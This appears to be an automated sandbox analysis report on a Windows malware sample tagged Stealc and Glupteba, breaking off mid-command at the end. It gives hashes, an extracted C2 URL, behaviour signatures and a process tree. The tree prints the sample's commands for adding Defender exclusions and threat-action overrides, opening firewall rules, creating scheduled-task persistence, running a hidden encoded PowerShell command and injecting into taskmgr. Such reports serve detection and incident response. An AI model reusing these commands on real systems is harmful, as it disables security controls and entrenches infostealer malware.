Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2024 19:05

General

  • Target

    file.exe

  • Size

    23KB

  • MD5

    13e50553cf74404e0667de093b05d4bb

  • SHA1

    d2b4e780b13305b25cba7cd3b2259d94d84120a8

  • SHA256

    8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5

  • SHA512

    23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c

  • SSDEEP

    384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 38 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3592
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4704
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:8
      • C:\Users\Admin\Pictures\Zj91d9v5NpNUsLuVMDIaf2ST.exe
        "C:\Users\Admin\Pictures\Zj91d9v5NpNUsLuVMDIaf2ST.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
          C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3208
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3352
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
              6⤵
              • Creates scheduled task(s)
              PID:4268
            • C:\Windows\SysWOW64\chcp.com
              chcp 1251
              6⤵
                PID:4016
          • C:\Users\Admin\AppData\Local\Temp\nsl94EF.tmp
            C:\Users\Admin\AppData\Local\Temp\nsl94EF.tmp
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1996
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 3304
              5⤵
              • Program crash
              PID:4272
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsl94EF.tmp" & del "C:\ProgramData\*.dll"" & exit
              5⤵
                PID:4968
          • C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe
            "C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4900
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3464
            • C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe
              "C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3236
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1304
              • C:\Windows\system32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                5⤵
                  PID:2248
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3196
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:448
            • C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe
              "C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1828
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2340
              • C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe
                "C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:748
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  5⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3104
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  5⤵
                    PID:4040
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      6⤵
                      • Modifies Windows Firewall
                      PID:3560
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1036
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                      PID:632
                    • C:\Windows\rss\csrss.exe
                      C:\Windows\rss\csrss.exe
                      5⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Manipulates WinMonFS driver.
                      • Drops file in Windows directory
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3888
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                          PID:2056
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          6⤵
                          • Creates scheduled task(s)
                          PID:4492
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            7⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:632
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3012
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /delete /tn ScheduledUpdate /f
                          6⤵
                            PID:1044
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                              PID:1732
                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                              6⤵
                              • Executes dropped EXE
                              PID:3532
                            • C:\Windows\SYSTEM32\schtasks.exe
                              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                              6⤵
                              • Creates scheduled task(s)
                              PID:4024
                            • C:\Windows\windefender.exe
                              "C:\Windows\windefender.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2744
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                7⤵
                                  PID:3716
                        • C:\Users\Admin\Pictures\SR8r1fGXkfJwLNsVVFuqln2W.exe
                          "C:\Users\Admin\Pictures\SR8r1fGXkfJwLNsVVFuqln2W.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4240
                        • C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe
                          "C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe" --silent --allusers=0
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          • Modifies system certificate store
                          • Suspicious use of WriteProcessMemory
                          PID:656
                          • C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe
                            C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2c0,0x2e4,0x2e8,0xc4,0x2ec,0x6ed69558,0x6ed69564,0x6ed69570
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:2152
                          • C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe
                            "C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=656 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240126190611" --session-guid=ae370165-9d80-4fa7-a410-0e02d9a720ca --server-tracking-blob=ZWZkZjMwY2QxZjI0NzA2YjJlN2QzZjRiYWI3YmNjMmIwM2U3YjA1ODNhYTVjYjg1ZmZjZDAxZmQyZmJkYjc5Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNjI5NTk2NC4zNDc3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4Zjc0MDA0Yy1lMzE0LTRmODQtYTAyZC0zN2Q5ZWQyNDY2YTMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Enumerates connected drives
                            • Suspicious use of WriteProcessMemory
                            PID:1816
                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\aH61TFChdeJtMgESTog4SHo0.exe
                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\aH61TFChdeJtMgESTog4SHo0.exe" --version
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:4736
                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:2860
                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe" --version
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:2008
                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7c2614,0x7c2620,0x7c262c
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3584
                        • C:\Users\Admin\Pictures\SMWfDLGtgBUDr1BgQF6ZSW2T.exe
                          "C:\Users\Admin\Pictures\SMWfDLGtgBUDr1BgQF6ZSW2T.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4676
                          • C:\Users\Admin\AppData\Local\Temp\7zSC8FD.tmp\Install.exe
                            .\Install.exe
                            4⤵
                            • Executes dropped EXE
                            PID:2672
                            • C:\Users\Admin\AppData\Local\Temp\7zSCC49.tmp\Install.exe
                              .\Install.exe /LzfYdidLoSR "385118" /S
                              5⤵
                              • Checks BIOS information in registry
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Enumerates system info in registry
                              PID:2508
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                6⤵
                                  PID:3172
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                    7⤵
                                      PID:232
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                        8⤵
                                          PID:3888
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                          8⤵
                                            PID:2640
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                        6⤵
                                          PID:2936
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                            7⤵
                                              PID:2744
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                8⤵
                                                  PID:3436
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                  8⤵
                                                    PID:2472
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /CREATE /TN "gMtnMrffB" /SC once /ST 02:47:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:2100
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /run /I /tn "gMtnMrffB"
                                                6⤵
                                                  PID:712
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\OHhyuzm.exe\" hp /Jfsite_idEgK 385118 /S" /V1 /F
                                                  6⤵
                                                  • Drops file in Windows directory
                                                  • Creates scheduled task(s)
                                                  PID:5080
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "gMtnMrffB"
                                                  6⤵
                                                    PID:1012
                                            • C:\Users\Admin\Pictures\0oZh5cYXBl8lBcDmHCsfbXMu.exe
                                              "C:\Users\Admin\Pictures\0oZh5cYXBl8lBcDmHCsfbXMu.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                                              3⤵
                                              • Executes dropped EXE
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2056
                                        • C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe
                                          C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6ddd9558,0x6ddd9564,0x6ddd9570
                                          1⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4756
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                          1⤵
                                          • Modifies Windows Firewall
                                          PID:4776
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                          1⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4536
                                          • C:\Windows\system32\gpupdate.exe
                                            "C:\Windows\system32\gpupdate.exe" /force
                                            2⤵
                                              PID:5080
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                            1⤵
                                              PID:2620
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                              1⤵
                                                PID:4144
                                              • C:\Windows\system32\gpscript.exe
                                                gpscript.exe /RefreshSystemParam
                                                1⤵
                                                  PID:1444
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 5
                                                  1⤵
                                                  • Delays execution with timeout.exe
                                                  PID:1444
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1996 -ip 1996
                                                  1⤵
                                                    PID:920
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                    1⤵
                                                    • Launches sc.exe
                                                    PID:4404
                                                  • C:\Windows\windefender.exe
                                                    C:\Windows\windefender.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:1204
                                                  • C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\OHhyuzm.exe
                                                    C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\OHhyuzm.exe hp /Jfsite_idEgK 385118 /S
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    PID:3088
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" 